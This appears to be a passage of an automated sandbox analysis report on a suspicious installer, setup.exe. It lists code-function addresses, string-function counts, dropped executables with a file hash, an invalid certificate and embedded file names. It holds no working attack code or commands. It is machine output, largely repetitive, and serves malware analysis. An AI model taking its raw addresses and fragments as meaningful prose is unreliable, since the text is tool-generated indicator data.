    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CD2C0_3_0838CD2C
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DC210_3_0838DC21
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DB400_3_0838DB40
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DEBF0_3_0838DEBF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDA90_3_0838DDA9
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838ADAA0_3_0838ADAA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9860_3_0838D986
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838D9F00_3_0838D9F0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838CDEF0_3_0838CDEF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0838DDDF0_3_0838DDDF
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004A03E00_2_004A03E0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004A26300_2_004A2630
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004BA6E00_2_004BA6E0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004D8DB00_2_004D8DB0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0048CF300_2_0048CF30
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004910500_2_00491050
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0047DB900_2_0047DB90
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00341CB00_2_00341CB0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004DA0300_2_004DA030
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004D01200_2_004D0120
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_003543400_2_00354340
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_003425100_2_00342510
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0047A6600_2_0047A660
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_005247400_2_00524740
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004C48300_2_004C4830
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004E28C00_2_004E28C0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00350B100_2_00350B10
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00348C300_2_00348C30
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00554D200_2_00554D20
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00344D430_2_00344D43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004D92200_2_004D9220
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0052B3500_2_0052B350
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_003A93500_2_003A9350
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_003133E00_2_003133E0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_003474100_2_00347410
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_005674390_2_00567439
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_003114900_2_00311490
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0033D6700_2_0033D670
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_003336700_2_00333670
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004816900_2_00481690
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_005617100_2_00561710
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00561A700_2_00561A70
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00317A000_2_00317A00
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00351D700_2_00351D70
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00451E500_2_00451E50
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0054BEEE0_2_0054BEEE
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_003553606_2_00355360
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_00341CB06_2_00341CB0
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_004DA0306_2_004DA030
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_004D01206_2_004D0120
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_004D92206_2_004D9220
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_003A93506_2_003A9350
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_003133E06_2_003133E0
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_003474106_2_00347410
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_003114906_2_00311490
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_003604806_2_00360480
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_004D84A06_2_004D84A0
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_0035F5236_2_0035F523
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_003425106_2_00342510
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_0035A5E06_2_0035A5E0
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_003336706_2_00333670
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_0033D6706_2_0033D670
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_005617106_2_00561710
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_003587E06_2_003587E0
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_004E28C06_2_004E28C0
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_00317A006_2_00317A00
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_00350B106_2_00350B10
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_00348C306_2_00348C30
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_00351D706_2_00351D70
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_00344D436_2_00344D43
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_004D8DB06_2_004D8DB0
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_00451E506_2_00451E50
    Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe 916084789D8A4864E93AFF0D0C22EB56E19C201C19EA2C8601D23B5C3C345519
    Source: C:\Users\user\Desktop\setup.exeCode function: String function: 0053FE17 appears 51 times
    Source: C:\Users\user\Desktop\setup.exeCode function: String function: 0031A7A0 appears 65 times
    Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00323440 appears 48 times
    Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00543394 appears 81 times
    Source: C:\Users\user\Desktop\setup.exeCode function: String function: 0031ADE0 appears 74 times
    Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00319240 appears 241 times
    Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00543F50 appears 39 times
    Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00468720 appears 58 times
    Source: C:\Users\user\Desktop\setup.exeCode function: String function: 003187C0 appears 60 times
    Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00318720 appears 104 times
    Source: setup.exeStatic PE information: invalid certificate
    Source: MainSoftware.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: SoftwareDistributor.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: SoftwareDistributor.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: MainSoftware.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: Install.exe.part.10.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: Surfclub.exe.34.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: Install.exe.part.10.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
    Source: setup.exe, 00000000.00000003.2597878555.0000000005523000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000D2D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Extensions.Configuration.Abstractions.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000002.2604752700.00000000083AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsi.dllX vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C727000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1748683968.00000000098C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelzmaextractor.dllF vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000CB33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000002.2601820260.000000000552C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C6EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.2597090667.00000000083AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsi.dllX vs setup.exe
    Source: setup.exe, 00000000.00000003.2592492698.00000000083A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsi.dllX vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C6F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C83C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C741000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Formats.Asn1.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000CB93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Extensions.Configuration.Abstractions.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C6F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C6AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSerilog.dll0 vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C73C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.StackTrace.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C74D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C870000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.2595875367.0000000005510000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C7F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000000.1723407074.00000000006A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName36.exe. vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000CAE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C772000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C821000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Quic.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C549000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscordaccore.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C549000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSIInstaller.dll: vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C549000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Extensions.Configuration.Abstractions.dll@ vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000C6BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSerilog.Formatting.Compact.dllV vs setup.exe
    Source: setup.exe, 00000000.00000003.1996568847.000000000CB85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Channels.dll@ vs setup.exe
